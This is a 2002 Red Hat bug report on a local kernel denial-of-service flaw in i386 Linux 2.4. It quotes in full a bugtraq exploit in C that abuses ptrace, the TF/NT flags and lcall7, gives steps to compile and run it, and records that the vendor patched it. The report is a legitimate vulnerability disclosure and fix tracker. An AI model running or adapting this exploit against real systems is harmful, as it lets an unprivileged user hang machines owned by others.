Bug 77834 - Working Dos from bugtraq mailing list
Product: Red Hat Linux
Classification: Retired
Component: kernel
i686 Linux
Priority: high  Severity: medium
Assigned To: Arjan van de Ven
Brian Brock
: Security
Reported: 2002-11-14 02:42 EST by Leonid Mamtchenkov
Modified: 2007-03-26 23:58 EDT (History)
Doc Type: Bug Fix
Last Closed: 2002-11-16 06:06:56 EST
Description Leonid Mamtchenkov 2002-11-14 02:42:49 EST
Description of Problem:
As was posted on the bugtraq[@securityfocus.com] mailing list:
From: Christophe Devine <DEVINE@iie.cnam.fr>
To: bugtraq@securityfocus.com
Date: Wed, 13 Nov 2002 00:59:09 +0000
Subject: Re: i386 Linux kernel DoS

On Wed, 13 Nov 2002, Stefan Laudat wrote:

> Regarding this issue: is it 80x86 or specifically 80386 designed ?
> Been trying it on AMD Duron, AMD Athlon MP, Intel i586 - just segfaults :(

Yep; the first version of the DoS I posted on bugtraq was defective and
worked only under special conditions (inside gdb for example).

However this updated version works much better:

#include <sys/ptrace.h>
#include <sys/wait.h>
#include <unistd.h>

/* i386 register layout as returned by PTRACE_GETREGS on 2.4 kernels */
struct user_regs_struct {
        long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        long orig_eax, eip;
        unsigned short cs, __cs;
        long eflags, esp;
        unsigned short ss, __ss;
};

int main( void )
{
    int pid;
    char dos[] = "\x9A\x00\x00\x00\x00\x07\x00"; /* lcall 0x7:0x0 */
    void (* lcall7)( void ) = (void *) dos;
    struct user_regs_struct d;

    if( ! ( pid = fork() ) )
    {
        /* child: give the parent time to attach, then execute the lcall7 */
        usleep( 1000 );
        (* lcall7)();
    }
    else
    {
        /* parent: trace the child and set TF and NT in its eflags at each stop */
        ptrace( PTRACE_ATTACH, pid, 0, 0 );
        while( 1 )
        {
            wait( 0 );
            ptrace( PTRACE_GETREGS, pid, 0, &d );
            d.eflags |= 0x4100; /* set TF and NT */
            ptrace( PTRACE_SETREGS, pid, 0, &d );
            ptrace( PTRACE_SYSCALL, pid, 0, 0 );
        }
    }

    return 1;
}

At the beginning I thought only kernels <= 2.4.18 were affected; but it
appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
The flaw seems to be related to the kernel's handling of the nested task
(NT) flag inside a lcall7.

Christophe Devine

This exploit compiles and works on my up2date-ed system with the latest kernel.

Version-Release number of selected component (if applicable):

How Reproducible:

Steps to Reproduce:
1. Save exploit to verybad.c
2. gcc verybad.c -o crash
3. ./crash

Actual Results:
System unresponsive, although pingable.

Expected Results:
Segmentation fault or something.

Additional Information:
Comment 1 Arjan van de Ven 2002-11-14 04:07:28 EST
yes we know about this; I built packages yesterday and they're in QA now
Comment 2 Arjan van de Ven 2002-11-16 06:06:56 EST
An errata has been issued which should help the problem described in this bug report. 
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, please follow the link below. You may reopen 
this bug report if the solution does not work for you.

Comment 3 Frederic Hermann 2002-11-18 05:44:15 EST
This bug affects RedHat Linux 6.2 as well. I ran the program above on an up-to-date RH6.2 box, as an unprivileged user, and the box totally hung.
